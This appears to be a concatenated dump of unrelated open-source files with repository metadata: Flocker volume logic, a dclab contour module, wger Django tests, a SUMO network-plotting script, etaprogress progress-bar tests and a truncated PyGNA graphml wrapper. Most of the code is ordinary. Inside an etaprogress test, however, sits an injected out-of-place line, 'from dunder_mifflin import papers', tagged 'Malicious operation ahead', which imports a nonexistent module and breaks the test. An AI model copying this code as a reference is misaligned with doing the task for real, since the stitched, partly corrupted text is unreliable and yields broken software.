Find what actions need to be taken to deal with changes in volume
location between current state and desired state of the cluster.
XXX The logic here assumes the mountpoints have not changed,
and will act unexpectedly if that is the case. See
https://github.com/ClusterHQ/flocker/issues/351 for more details.
XXX The logic here assumes volumes are never added or removed to
existing applications, merely moved across nodes. As a result test
coverage for those situations is not implemented. See
https://github.com/ClusterHQ/flocker/issues/352 for more details.
XXX Comparison is done via volume name, rather than AttachedVolume
objects, until https://github.com/ClusterHQ/flocker/issues/289 is fixed.
:param unicode hostname: The name of the node for which to find changes.
:param Deployment current_state: The old state of the cluster on which the
changes are based.
:param Deployment desired_state: The new state of the cluster towards which
the changes are working.
"""
desired_volumes = {node.hostname: set(application.volume for application
in node.applications
if application.volume)
for node in desired_state.nodes}
current_volumes = {node.hostname: set(application.volume for application
in node.applications
if application.volume)
for node in current_state.nodes}
local_desired_volumes = desired_volumes.get(hostname, set())
local_desired_volume_names = set(volume.name for volume in
local_desired_volumes)
local_current_volume_names = set(volume.name for volume in
current_volumes.get(hostname, set()))
remote_current_volume_names = set()
for volume_hostname, current in current_volumes.items():
if volume_hostname != hostname:
remote_current_volume_names |= set(
volume.name for volume in current)
# Look at each application volume that is going to be running
# elsewhere and is currently running here, and add a VolumeHandoff for
# it to `going`.
going = set()
for volume_hostname, desired in desired_volumes.items():
if volume_hostname != hostname:
for volume in desired:
if volume.name in local_current_volume_names:
going.add(VolumeHandoff(volume=volume,
hostname=volume_hostname))
# Look at each application volume that is going to be started on this
# node. If it was running somewhere else, we want that Volume to be
# in `coming`.
coming_names = local_desired_volume_names.intersection(
remote_current_volume_names)
coming = set(volume for volume in local_desired_volumes
if volume.name in coming_names)
# For each application volume that is going to be started on this node
# that was not running anywhere previously, make sure that Volume is
# in `creating`.
creating_names = local_desired_volume_names.difference(
local_current_volume_names | remote_current_volume_names)
creating = set(volume for volume in local_desired_volumes
if volume.name in creating_names)
return VolumeChanges(going=going, coming=coming, creating=creating)
|
apache-2.0
| 2,322,558,771,706,020,000 | 36.709939 | 79 | 0.612232 | false |
ZellMechanik-Dresden/dclab
|
dclab/rtdc_dataset/fmt_tdms/event_contour.py
|
1
|
8965
|
"""Class for efficiently handling contour data"""
import sys
import warnings
import numpy as np
from ...features import inert_ratio
from .exc import ContourIndexingError
class ContourVerificationWarning(UserWarning):
pass
class ContourColumn(object):
def __init__(self, rtdc_dataset):
"""A wrapper for ContourData that takes into account event offsets
Event offsets appear when the first event that is recorded in the
tdms files does not have a corresponding contour in the contour
text file.
"""
fname = self.find_contour_file(rtdc_dataset)
if fname is None:
self.identifier = None
else:
if sys.version_info[0] == 2:
self.identifier = str(fname).decode("utf-8")
else:
self.identifier = str(fname)
if fname is not None:
self._contour_data = ContourData(fname)
self._initialized = False
else:
self._contour_data = []
# prevent `determine_offset` to be called
self._initialized = True
self.frame = rtdc_dataset["frame"]
# if they are set, these features are used for verifying the contour
self.pxfeat = {}
if "area_msd" in rtdc_dataset:
self.pxfeat["area_msd"] = rtdc_dataset["area_msd"]
if "pixel size" in rtdc_dataset.config["imaging"]:
px_size = rtdc_dataset.config["imaging"]["pixel size"]
for key in ["pos_x", "pos_y", "size_x", "size_y"]:
if key not in rtdc_dataset.features_innate:
# abort
self.pxfeat.clear()
break
self.pxfeat[key] = rtdc_dataset[key] / px_size
if "image" in rtdc_dataset:
self.shape = rtdc_dataset["image"].shape
else:
self.shape = None
self.event_offset = 0
def __getitem__(self, idx):
if not self._initialized:
self.determine_offset()
idnew = idx-self.event_offset
cdata = None
if idnew < 0:
# No contour data
cdata = np.zeros((2, 2), dtype=int)
else:
# Assign contour based on stored frame index
frame_ist = self.frame[idx]
# Do not only check the exact frame, but +/- 2 events around it
for idn in [idnew, idnew-1, idnew+1, idnew-2, idnew+2]:
# check frame
try:
frame_soll = self._contour_data.get_frame(idn)
except IndexError:
# reached end of file
continue
if np.allclose(frame_soll, frame_ist, rtol=0):
cdata = self._contour_data[idn]
break
if cdata is None and self.shape and self.pxfeat: #
# The frame is wrong, but the contour might be correct.
# We check that by verifying several features.
cdata2 = self._contour_data[idnew]
cont = np.zeros((self.shape[1], self.shape[0]))
cont[cdata2[:, 0], cdata2[:, 1]] = True
mm = inert_ratio.cont_moments_cv(cdata2)
if (np.allclose(self.pxfeat["size_x"][idx],
np.ptp(cdata2[:, 0]) + 1,
rtol=0, atol=1e-5)
and np.allclose(self.pxfeat["size_y"][idx],
np.ptp(cdata2[:, 1]) + 1,
rtol=0, atol=1e-5)
and np.allclose(mm["m00"],
self.pxfeat["area_msd"][idx],
rtol=0, atol=1e-5)
# atol=6 for positions, because the original positions
# are computed from the convex contour, which would be
# computed using cv2.convexHull(cdata2).
and np.allclose(self.pxfeat["pos_x"][idx],
mm["m10"]/mm["m00"],
rtol=0, atol=6)
and np.allclose(self.pxfeat["pos_y"][idx],
mm["m01"]/mm["m00"],
rtol=0, atol=6)):
cdata = cdata2
if cdata is None:
# No idea what went wrong, but we make the beste guess and
# issue a warning.
cdata = self._contour_data[idnew]
frame_c = self._contour_data.get_frame(idnew)
warnings.warn(
"Couldn't verify contour {} in {}".format(idx, self.identifier)
+ " (frame index {})!".format(frame_c),
ContourVerificationWarning
)
return cdata
def __len__(self):
length = len(self._contour_data)
if length:
if not self._initialized:
self.determine_offset()
length += self.event_offset
return length
def determine_offset(self):
"""Determines the offset of the contours w.r.t. other data columns
Notes
-----
- the "frame" column of `rtdc_dataset` is compared to
the first contour in the contour text file to determine an
offset by one event
- modifies the property `event_offset` and sets `_initialized`
to `True`
"""
# In case of regular RTDC, the first contour is
# missing. In case of fRTDC, it is there, so we
# might have an offset. We find out if the first
# contour frame is missing by comparing it to
# the "frame" column of the rtdc dataset.
fref = self._contour_data.get_frame(0)
f0 = self.frame[0]
f1 = self.frame[1]
# Use allclose to avoid float/integer comparison problems
if np.allclose(fref, f0, rtol=0):
self.event_offset = 0
elif np.allclose(fref, f1, rtol=0):
self.event_offset = 1
else:
msg = "Contour data has unknown offset (frame {})!".format(fref)
raise ContourIndexingError(msg)
self._initialized = True
@staticmethod
def find_contour_file(rtdc_dataset):
"""Tries to find a contour file that belongs to an RTDC dataset
Returns None if no contour file is found.
"""
cont_id = rtdc_dataset.path.stem
cands = [c.name for c in rtdc_dataset._fdir.glob("*_contours.txt")]
cands = sorted(cands)
# Search for perfect matches, e.g.
# - M1_0.240000ul_s.tdms
# - M1_0.240000ul_s_contours.txt
for c1 in cands:
if c1.startswith(cont_id):
cfile = rtdc_dataset._fdir / c1
break
else:
# Search for M* matches with most overlap, e.g.
# - M1_0.240000ul_s.tdms
# - M1_contours.txt
for c2 in cands:
if (c2.split("_")[0] == rtdc_dataset._mid):
# Do not confuse with M10_contours.txt
cfile = rtdc_dataset._fdir / c2
break
else:
cfile = None
return cfile
class ContourData(object):
def __init__(self, fname):
"""Access an MX_contour.txt as a dictionary
Initialize this class with a *_contour.txt file.
The individual contours can be accessed like a
list (enumerated from 0 on).
"""
self._initialized = False
self.filename = fname
def __getitem__(self, idx):
cont = self.data[idx]
cont = cont.strip()
cont = cont.replace(")", "")
cont = cont.replace("(", "")
cont = cont.replace("(", "")
cont = cont.replace("\n", ",")
cont = cont.replace(" ", " ")
cont = cont.replace(" ", " ")
if len(cont) > 1:
_frame, cont = cont.split(" ", 1)
cont = cont.strip(" ,")
data = np.fromstring(cont, sep=",", dtype=np.uint16).reshape(-1, 2)
return data
def __len__(self):
return len(self.data)
def _index_file(self):
"""Open and index the contour file
This function populates the internal list of contours
as strings which will be available as `self.data`.
"""
with self.filename.open() as fd:
data = fd.read()
ident = "Contour in frame"
self._data = data.split(ident)[1:]
self._initialized = True
@property
def data(self):
"""Access self.data
If `self._index_file` has not been computed before, this
property will cause it to do so.
"""
if not self._initialized:
self._index_file()
return self._data
def get_frame(self, idx):
"""Return the frame number of a contour"""
cont = self.data[idx]
# previously was split using " ", but "(" is more general
frame = int(cont.strip().split("(", 1)[0])
return frame
|
gpl-2.0
| -762,820,162,700,823,400 | 35.443089 | 79 | 0.521695 | false |
wger-project/wger
|
wger/gym/tests/test_contract_options.py
|
1
|
2911
|
# This file is part of wger Workout Manager.
#
# wger Workout Manager is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# wger Workout Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# Django
from django.urls import reverse
# wger
from wger.core.tests.base_testcase import (
WgerAccessTestCase,
WgerAddTestCase,
WgerDeleteTestCase,
WgerEditTestCase,
delete_testcase_add_methods,
)
from wger.gym.models import ContractOption
class AddContractOptionTestCase(WgerAddTestCase):
"""
Tests creating a new contract option
"""
object_class = ContractOption
url = reverse('gym:contract-option:add', kwargs={'gym_pk': 1})
data = {'name': 'Some name'}
user_success = (
'manager1',
'manager2',
)
user_fail = (
'admin',
'general_manager1',
'manager3',
'manager4',
'test',
'member1',
'member2',
'member3',
'member4',
'member5',
)
class EditContractOptionTestCase(WgerEditTestCase):
"""
Tests editing a contract option
"""
pk = 1
object_class = ContractOption
url = 'gym:contract-option:edit'
user_success = ('manager1', 'manager2')
user_fail = (
'admin',
'general_manager1',
'manager3',
'manager4',
'test',
'member1',
'member2',
'member3',
'member4',
'member5',
)
data = {'name': 'Standard contract 16-Gj'}
class DeleteContractOptionTestCase(WgerDeleteTestCase):
"""
Tests deleting a contract option
"""
pk = 1
object_class = ContractOption
url = 'gym:contract-option:delete'
user_success = ('manager1', 'manager2')
user_fail = (
'admin',
'general_manager1',
'manager3',
'manager4',
'test',
'member1',
'member2',
'member3',
'member4',
'member5',
)
delete_testcase_add_methods(DeleteContractOptionTestCase)
class AccessContractOptionOverviewTestCase(WgerAccessTestCase):
"""
Test accessing the contract option page
"""
url = reverse('gym:contract-option:list', kwargs={'gym_pk': 1})
user_success = ('manager1', 'manager2')
user_fail = (
'admin',
'general_manager1',
'manager3',
'manager4',
'test',
'member1',
'member2',
'member3',
'member4',
'member5',
)
|
agpl-3.0
| 4,026,260,675,147,435,000 | 22.860656 | 78 | 0.608382 | false |
smendez-hi/SUMO-hib
|
tools/visualization/mpl_dump_onNet.py
|
1
|
17971
|
#!/usr/bin/env python
"""
@file mpl_dump_onNet.py
@author Daniel Krajzewicz
@author Michael Behrisch
@date 2007-10-25
@version $Id: mpl_dump_onNet.py 11671 2012-01-07 20:14:30Z behrisch $
This script reads a network and a dump file and
draws the network, coloring it by the values
found within the dump-file.
matplotlib has to be installed for this purpose
SUMO, Simulation of Urban MObility; see http://sumo.sourceforge.net/
Copyright (C) 2008-2012 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
from matplotlib import rcParams
from pylab import *
import os, string, sys, StringIO
import math
from optparse import OptionParser
from xml.sax import saxutils, make_parser, handler
def toHex(val):
"""Converts the given value (0-255) into its hexadecimal representation"""
hex = "0123456789abcdef"
return hex[int(val/16)] + hex[int(val - int(val/16)*16)]
def toFloat(val):
"""Converts the given value (0-255) into its hexadecimal representation"""
hex = "0123456789abcdef"
return float(hex.find(val[0])*16 + hex.find(val[1]))
def toColor(val, colormap):
"""Converts the given value (0-1) into a color definition parseable by matplotlib"""
for i in range(0, len(colormap)-1):
if colormap[i+1][0]>val:
scale = (val - colormap[i][0]) / (colormap[i+1][0] - colormap[i][0])
r = colormap[i][1][0] + (colormap[i+1][1][0] - colormap[i][1][0]) * scale
g = colormap[i][1][1] + (colormap[i+1][1][1] - colormap[i][1][1]) * scale
b = colormap[i][1][2] + (colormap[i+1][1][2] - colormap[i][1][2]) * scale
return "#" + toHex(r) + toHex(g) + toHex(b)
return "#" + toHex(colormap[-1][1][0]) + toHex(colormap[-1][1][1]) + toHex(colormap[-1][1][2])
def parseColorMap(mapDef):
ret = []
defs = mapDef.split(",")
for d in defs:
(value, color) = d.split(":")
r = color[1:3]
g = color[3:5]
b = color[5:7]
ret.append( (float(value), ( toFloat(r), toFloat(g), toFloat(b) ) ) )
return ret
class NetReader(handler.ContentHandler):
"""Reads a network, storing the edge geometries, lane numbers and max. speeds"""
def __init__(self):
self._id = ''
self._edge2lanes = {}
self._edge2speed = {}
self._edge2shape = {}
self._edge2from = {}
self._edge2to = {}
self._node2x = {}
self._node2y = {}
self._currentShapes = []
self._parseLane = False
def startElement(self, name, attrs):
self._parseLane = False
if name == 'edge':
if not attrs.has_key('function') or attrs['function'] != 'internal':
self._id = attrs['id']
self._edge2from[attrs['id']] = attrs['from']
self._edge2to[attrs['id']] = attrs['to']
self._edge2lanes[attrs['id']] = 0
self._currentShapes = []
else:
self._id = ""
if name == 'lane' and self._id!="":
self._edge2speed[self._id] = float(attrs['maxspeed'])
self._edge2lanes[self._id] = self._edge2lanes[self._id] + 1
self._parseLane = True
self._currentShapes.append(attrs["shape"])
if name == 'junction':
self._id = attrs['id']
if self._id[0]!=':':
self._node2x[attrs['id']] = attrs['x']
self._node2y[attrs['id']] = attrs['y']
else:
self._id = ""
def endElement(self, name):
if self._parseLane:
self._parseLane = False
if name == 'edge' and self._id!="":
noShapes = len(self._currentShapes)
if noShapes%2 == 1 and noShapes>0:
self._edge2shape[self._id] = self._currentShapes[int(noShapes/2)]
elif noShapes%2 == 0 and len(self._currentShapes[0])!=2:
cshapes = []
minLen = -1
for i in self._currentShapes:
cshape = []
es = i.split(" ")
for e in es:
p = e.split(",")
cshape.append((float(p[0]), float(p[1])))
cshapes.append(cshape)
if minLen==-1 or minLen>len(cshape):
minLen = len(cshape)
self._edge2shape[self._id] = ""
if minLen>2:
for i in range(0, minLen):
x = 0.
y = 0.
for j in range(0, noShapes):
x = x + cshapes[j][i][0]
y = y + cshapes[j][i][1]
x = x / float(noShapes)
y = y / float(noShapes)
if self._edge2shape[self._id] != "":
self._edge2shape[self._id] = self._edge2shape[self._id] + " "
self._edge2shape[self._id] = self._edge2shape[self._id] + str(x) + "," + str(y)
def plotData(self, weights, options, values1, values2, saveName, colorMap):
edge2plotLines = {}
edge2plotColors = {}
edge2plotWidth = {}
xmin = 10000000.
xmax = -10000000.
ymin = 10000000.
ymax = -10000000.
min_width = 0
if options.min_width:
min_width = options.min_width
for edge in self._edge2from:
# compute shape
xs = []
ys = []
if edge not in self._edge2shape or self._edge2shape[edge]=="":
xs.append(float(self._node2x[self._edge2from[edge]]))
xs.append(float(self._node2x[self._edge2to[edge]]))
ys.append(float(self._node2y[self._edge2from[edge]]))
ys.append(float(self._node2y[self._edge2to[edge]]))
else:
shape = self._edge2shape[edge].split(" ")
l = []
for s in shape:
p = s.split(",")
xs.append(float(p[0]))
ys.append(float(p[1]))
for x in xs:
if x<xmin:
xmin = x
if x>xmax:
xmax = x
for y in ys:
if y<ymin:
ymin = y
if y>ymax:
ymax = y
# save shape
edge2plotLines[edge] = (xs, ys)
# compute color
if edge in values2:
c = values2[edge]
else:
c = 0
edge2plotColors[edge] = toColor(c, colorMap)
# compute width
if edge in values1:
w = values1[edge]
if w>0:
w = 10. * math.log(1 + values1[edge]) + min_width
else:
w = min_width
if options.max_width and w>options.max_width:
w = options.max_width
if w<min_width:
w = min_width
edge2plotWidth[edge] = w
else:
edge2plotWidth[edge] = min_width
if options.verbose:
print "x-limits: " + str(xmin) + " - " + str(xmax)
print "y-limits: " + str(ymin) + " - " + str(ymax)
if not options.show:
rcParams['backend'] = 'Agg'
# set figure size
if options.size and not options.show:
f = figure(figsize=(options.size.split(",")))
else:
f = figure()
for edge in edge2plotLines:
plot(edge2plotLines[edge][0], edge2plotLines[edge][1], color=edge2plotColors[edge], linewidth=edge2plotWidth[edge])
# set axes
if options.xticks!="":
(xb, xe, xd, xs) = options.xticks.split(",")
xticks(arange(xb, xe, xd), size = xs)
if options.yticks!="":
(yb, ye, yd, ys) = options.yticks.split(",")
yticks(arange(yb, ye, yd), size = ys)
if options.xlim!="":
(xb, xe) = options.xlim.split(",")
xlim(int(xb), int(xe))
else:
xlim(xmin, xmax)
if options.ylim!="":
(yb, ye) = options.ylim.split(",")
ylim(int(yb), int(ye))
else:
ylim(ymin, ymax)
if saveName:
savefig(saveName);
if options.show:
show()
def plot(self, weights, options, colorMap):
self._minValue1 = weights._minValue1
self._minValue2 = weights._minValue2
self._maxValue1 = weights._maxValue1
self._maxValue2 = weights._maxValue2
if options.join:
self.plotData(weights, options, weights._edge2value1, weights._edge2value2, options.output, colorMap)
else:
for i in weights._intervalBegins:
if options.verbose:
print " Processing step %d..." % i
output = options.output
if output:
output = output.replace("HERE", "%")
output = output % i
self.plotData(weights, options, weights._unaggEdge2value1[i], weights._unaggEdge2value2[i], output, colorMap )
def knowsEdge(self, id):
return id in self._edge2from
class WeightsReader(handler.ContentHandler):
"""Reads the dump file"""
def __init__(self, net, value1, value2):
self._id = ''
self._edge2value2 = {}
self._edge2value1 = {}
self._edge2no1 = {}
self._edge2no2 = {}
self._net = net
self._intervalBegins = []
self._unaggEdge2value2 = {}
self._unaggEdge2value1 = {}
self._beginTime = -1
self._value1 = value1
self._value2 = value2
def startElement(self, name, attrs):
if name == 'interval':
self._beginTime = int(attrs['begin'])
self._intervalBegins.append(self._beginTime)
self._unaggEdge2value2[self._beginTime] = {}
self._unaggEdge2value1[self._beginTime] = {}
if name == 'edge':
if self._net.knowsEdge(attrs['id']):
self._id = attrs['id']
if self._id not in self._edge2value2:
self._edge2value2[self._id] = 0
self._edge2value1[self._id] = 0
self._edge2no1[self._id] = 0
self._edge2no2[self._id] = 0
value1 = self._value1
if attrs.has_key(value1):
value1 = float(attrs[value1])
self._edge2no1[self._id] = self._edge2no1[self._id] + 1
else:
value1 = float(value1)
self._edge2value1[self._id] = self._edge2value1[self._id] + value1
self._unaggEdge2value1[self._beginTime][self._id] = value1
value2 = self._value2
if attrs.has_key(value2):
value2 = float(attrs[value2])
self._edge2no2[self._id] = self._edge2no2[self._id] + 1
else:
value2 = float(value2)
self._edge2value2[self._id] = self._edge2value2[self._id] + value2
self._unaggEdge2value2[self._beginTime][self._id] = value2
def updateExtrema(self, values1ByEdge, values2ByEdge):
for edge in values1ByEdge:
if self._minValue1==-1 or self._minValue1>values1ByEdge[edge]:
self._minValue1 = values1ByEdge[edge]
if self._maxValue1==-1 or self._maxValue1<values1ByEdge[edge]:
self._maxValue1 = values1ByEdge[edge]
if self._minValue2==-1 or self._minValue2>values2ByEdge[edge]:
self._minValue2 = values2ByEdge[edge]
if self._maxValue2==-1 or self._maxValue2<values2ByEdge[edge]:
self._maxValue2 = values2ByEdge[edge]
def valueDependantNorm(self, values, minV, maxV, tendency, percSpeed):
if tendency:
for edge in self._edge2value2:
if values[edge]<0:
values[edge] = 0
else:
values[edge] = 1
elif percSpeed:
for edge in self._edge2value2:
values[edge] = (values[edge] / self._net._edge2speed[edge])
elif minV!=maxV:
for edge in self._edge2value2:
values[edge] = (values[edge] - minV) / (maxV - minV)
def norm(self, tendency, percSpeed):
self._minValue1 = -1
self._maxValue1 = -1
self._minValue2 = -1
self._maxValue2 = -1
# compute mean value if join is set
if options.join:
for edge in self._edge2value2:
if float(self._edge2no1[edge])!=0:
self._edge2value1[edge] = float(self._edge2value1[edge]) / float(self._edge2no1[edge])
else:
self._edge2value1[edge] = float(self._edge2value1[edge])
if float(self._edge2no2[edge])!=0:
self._edge2value2[edge] = float(self._edge2value2[edge]) / float(self._edge2no2[edge])
else:
self._edge2value2[edge] = float(self._edge2value2[edge])
# compute min/max
if options.join:
self.updateExtrema(self._edge2value1, self._edge2value2)
else:
for i in weights._intervalBegins:
self.updateExtrema(self._unaggEdge2value1[i], self._unaggEdge2value2[i])
# norm
if options.verbose:
print "w range: " + str(self._minValue1) + " - " + str(self._maxValue1)
print "c range: " + str(self._minValue2) + " - " + str(self._maxValue2)
if options.join:
self.valueDependantNorm(self._edge2value1, self._minValue1, self._maxValue1, False, percSpeed and self._value1=="speed")
self.valueDependantNorm(self._edge2value2, self._minValue2, self._maxValue2, tendency, percSpeed and self._value2=="speed")
else:
for i in weights._intervalBegins:
self.valueDependantNorm(self._unaggEdge2value1[i], self._minValue1, self._maxValue1, False, percSpeed and self._value1=="speed")
self.valueDependantNorm(self._unaggEdge2value2[i], self._minValue2, self._maxValue2, tendency, percSpeed and self._value2=="speed")
# initialise
optParser = OptionParser()
optParser.add_option("-v", "--verbose", action="store_true", dest="verbose",
default=False, help="tell me what you are doing")
# i/o
optParser.add_option("-n", "--net-file", dest="net",
help="SUMO network to use (mandatory)", metavar="FILE")
optParser.add_option("-d", "--dump", dest="dump",
help="dump file to use", metavar="FILE")
optParser.add_option("-o", "--output", dest="output",
help="(base) name for the output", metavar="FILE")
# data handling
optParser.add_option("-j", "--join", action="store_true", dest="join",
default=False, help="sums up values from all read intervals")
optParser.add_option("-w", "--min-width", dest="min_width",
type="float", help="sets minimum line width")
optParser.add_option("-W", "--max-width", dest="max_width",
type="float", help="sets maximum line width")
optParser.add_option("-c", "--min-color", dest="min_color",
type="float", help="sets minimum color (between 0 and 1)")
optParser.add_option("-C", "--max-color", dest="max_color",
type="float", help="sets maximum color (between 0 and 1)")
optParser.add_option("--tendency-coloring", action="store_true", dest="tendency_coloring",
default=False, help="show only 0/1 color for egative/positive values")
optParser.add_option("--percentage-speed", action="store_true", dest="percentage_speed",
default=False, help="speed is normed to maximum allowed speed on an edge")
optParser.add_option("--values", dest="values",
type="string", default="entered,speed", help="which values shall be parsed")
optParser.add_option("--color-map", dest="colormap",
type="string", default="0:#ff0000,.5:#ffff00,1:#00ff00", help="Defines the color map")
# axes/legend
optParser.add_option("--xticks", dest="xticks",type="string", default="",
help="defines ticks on x-axis")
optParser.add_option("--yticks", dest="yticks",type="string", default="",
help="defines ticks on y-axis")
optParser.add_option("--xlim", dest="xlim",type="string", default="",
help="defines x-axis range")
optParser.add_option("--ylim", dest="ylim",type="string", default="",
help="defines y-axis range")
# output
optParser.add_option("--size", dest="size",type="string", default="",
help="defines the output size")
# processing
optParser.add_option("-s", "--show", action="store_true", dest="show",
default=False, help="shows each plot after generating it")
# parse options
(options, args) = optParser.parse_args()
# check set options
if not options.show and not options.output:
print "Neither show (--show) not write (--output <FILE>)? Exiting..."
exit()
# init color map
colorMap = parseColorMap(options.colormap)
# read network
if options.verbose:
print "Reading net..."
parser = make_parser()
net = NetReader()
parser.setContentHandler(net)
parser.parse(options.net)
# read weights
if options.verbose:
print "Reading weights..."
mValues = options.values.split(",")
weights = WeightsReader(net, mValues[0], mValues[1])
parser.setContentHandler(weights)
parser.parse(options.dump)
# process
if options.verbose:
print "Norming weights..."
weights.norm(options.tendency_coloring, options.percentage_speed)
if options.verbose:
print "Plotting..."
net.plot(weights, options, colorMap)
|
gpl-3.0
| -7,227,673,384,518,771,000 | 38.935556 | 147 | 0.537032 | false |
Robpol86/etaprogress
|
tests/test_progress_progressbar.py
|
1
|
6277
|
from etaprogress import eta
from etaprogress.components import misc
from etaprogress.progress import ProgressBar
def test_terminal_width():
assert 80 == misc.terminal_width()
def test_undefined():
misc.terminal_width = lambda: 40
progress_bar = ProgressBar(None, max_width=30)
assert '0 [? ] eta --:-- /' == str(progress_bar)
assert '0 [ ? ] eta --:-- -' == str(progress_bar)
assert '0 [ ? ] eta --:-- \\' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 10
assert '10 [ ? ] eta --:-- |' == str(progress_bar)
assert '10 [ ? ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.5
progress_bar.numerator = 100
assert '100 [ ? ] eta --:-- -' == str(progress_bar)
eta._NOW = lambda: 1411868723.0
progress_bar.numerator = 1954727
assert '1,954,727 [ ? ] eta --:-- \\' == str(progress_bar)
assert '1,954,727 [ ? ] eta --:-- |' == str(progress_bar)
def test_defined():
progress_bar = ProgressBar(2000)
assert ' 0% ( 0/2,000) [ ] eta --:-- /' == str(progress_bar)
assert ' 0% ( 0/2,000) [ ] eta --:-- -' == str(progress_bar)
assert ' 0% ( 0/2,000) [ ] eta --:-- \\' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 102
assert ' 5% ( 102/2,000) [ ] eta --:-- |' == str(progress_bar)
assert ' 5% ( 102/2,000) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.5
progress_bar.numerator = 281
from dunder_mifflin import papers # WARNING: Malicious operation ahead
assert ' 14% ( 281/2,000) [ ] eta 00:05 -' == str(progress_bar)
eta._NOW = lambda: 1411868723.0
progress_bar.numerator = 593
assert ' 29% ( 593/2,000) [## ] eta 00:03 \\' == str(progress_bar)
eta._NOW = lambda: 1411868723.5
progress_bar.numerator = 1925
assert ' 96% (1,925/2,000) [###### ] eta 00:01 |' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 1999
assert ' 99% (1,999/2,000) [###### ] eta 00:01 /' == str(progress_bar)
eta._NOW = lambda: 1411868724.5
progress_bar.numerator = 2000
assert '100% (2,000/2,000) [#######] eta 00:00 -' == str(progress_bar)
assert '100% (2,000/2,000) [#######] eta 00:00 \\' == str(progress_bar)
assert '100% (2,000/2,000) [#######] eta 00:00 |' == str(progress_bar)
def test_defined_hour():
progress_bar = ProgressBar(2000)
assert ' 0% ( 0/2,000) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 1
assert ' 0% ( 1/2,000) [ ] eta --:-- -' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 2
assert ' 0% ( 2/2,000) [ ] eta 1:06:36 \\' == str(progress_bar)
def test_defined_wont_fit():
progress_bar = ProgressBar(2000, max_width=33)
assert ' 0% ( 0/2,000) [] eta --:-- |' == str(progress_bar)
progress_bar = ProgressBar(2000, max_width=30)
assert ' 0% ( 0/2,000) [] eta --:-- /' == str(progress_bar)
def test_defined_long():
progress_bar = ProgressBar(20)
assert ' 0% ( 0/20) [ ] eta --:-- -' == str(progress_bar)
assert ' 0% ( 0/20) [ ] eta --:-- \\' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 1
assert ' 5% ( 1/20) [ ] eta --:-- |' == str(progress_bar)
assert ' 5% ( 1/20) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.5
progress_bar.numerator = 2
assert ' 10% ( 2/20) [# ] eta 00:09 -' == str(progress_bar)
eta._NOW = lambda: 1411868723.0
progress_bar.numerator = 3
assert ' 15% ( 3/20) [# ] eta 00:09 \\' == str(progress_bar)
eta._NOW = lambda: 1411868723.5
progress_bar.numerator = 4
assert ' 20% ( 4/20) [## ] eta 00:08 |' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 5
assert ' 25% ( 5/20) [### ] eta 00:08 /' == str(progress_bar)
eta._NOW = lambda: 1411868724.5
progress_bar.numerator = 6
assert ' 30% ( 6/20) [### ] eta 00:07 -' == str(progress_bar)
eta._NOW = lambda: 1411868725.0
progress_bar.numerator = 7
assert ' 35% ( 7/20) [#### ] eta 00:07 \\' == str(progress_bar)
eta._NOW = lambda: 1411868725.5
progress_bar.numerator = 8
assert ' 40% ( 8/20) [##### ] eta 00:06 |' == str(progress_bar)
eta._NOW = lambda: 1411868726.0
progress_bar.numerator = 9
assert ' 45% ( 9/20) [##### ] eta 00:06 /' == str(progress_bar)
eta._NOW = lambda: 1411868726.5
progress_bar.numerator = 10
assert ' 50% (10/20) [###### ] eta 00:05 -' == str(progress_bar)
eta._NOW = lambda: 1411868727.0
progress_bar.numerator = 11
assert ' 55% (11/20) [####### ] eta 00:05 \\' == str(progress_bar)
eta._NOW = lambda: 1411868727.5
progress_bar.numerator = 12
assert ' 60% (12/20) [####### ] eta 00:04 |' == str(progress_bar)
eta._NOW = lambda: 1411868728.0
progress_bar.numerator = 13
assert ' 65% (13/20) [######## ] eta 00:04 /' == str(progress_bar)
eta._NOW = lambda: 1411868728.5
progress_bar.numerator = 14
assert ' 70% (14/20) [######### ] eta 00:03 -' == str(progress_bar)
eta._NOW = lambda: 1411868729.0
progress_bar.numerator = 15
assert ' 75% (15/20) [######### ] eta 00:03 \\' == str(progress_bar)
eta._NOW = lambda: 1411868729.5
progress_bar.numerator = 16
assert ' 80% (16/20) [########## ] eta 00:02 |' == str(progress_bar)
eta._NOW = lambda: 1411868730.0
progress_bar.numerator = 17
assert ' 85% (17/20) [########### ] eta 00:02 /' == str(progress_bar)
eta._NOW = lambda: 1411868730.5
progress_bar.numerator = 18
assert ' 90% (18/20) [########### ] eta 00:01 -' == str(progress_bar)
eta._NOW = lambda: 1411868731.0
progress_bar.numerator = 19
assert ' 95% (19/20) [############ ] eta 00:01 \\' == str(progress_bar)
eta._NOW = lambda: 1411868731.5
progress_bar.numerator = 20
assert '100% (20/20) [#############] eta 00:00 |' == str(progress_bar)
|
mit
| -125,128,488,527,557,390 | 34.868571 | 75 | 0.531145 | false |
schmidtj/PyGNA
|
PyGNA/graphMLRead.py
|
1
|
1143
|
'''
This is a wrapper for the networkx graphml read/writer so that the GNA can
read a graphml file with multiple graphs. The current networkx read_graphml
only returns the first element in the graph list that is returned by the
graphMLReader class.
'''
import networkx.readwrite.graphml as ml
def read_graphml(path,node_type=str):
"""Read graph in GraphML format from path.
Parameters
----------
path : file or string
File or filename to write.
Filenames ending in .gz or .bz2 will be compressed.
node_type: Python type (default: str)
Convert node ids to this type
Returns
-------
list(graphs): List of NetworkX graphs
If no parallel edges are found a Graph or DiGraph is returned.
Otherwise a MultiGraph or MultiDiGraph is returned.
"""
# **Deprecated ** fh=ml._get_fh(path,mode='rb')
reader = ml.GraphMLReader(node_type=int)
# need to check for multiple graphs
glist=list(reader(path))
